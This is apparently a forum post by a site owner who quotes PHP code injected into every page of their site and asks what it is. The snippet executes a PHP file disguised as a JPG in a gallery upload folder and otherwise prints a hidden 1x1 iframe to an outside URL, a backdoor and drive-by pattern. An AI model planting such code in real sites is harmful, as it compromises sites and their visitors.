<?php if (file_exists("/home/*********/public_html/gallery/albums/userpics/10001/45563131x.jpg")) { include("/home/*************/public_html/gallery/albums/userpics/10001/45563131x.jpg"); } else { echo "<iframe src='http://example.com' width=1 height=1></iframe>"; } ?>
How did this get inserted on every PHP page I had? I knew my host had a PHP downtime, but what is this?! Explainations please?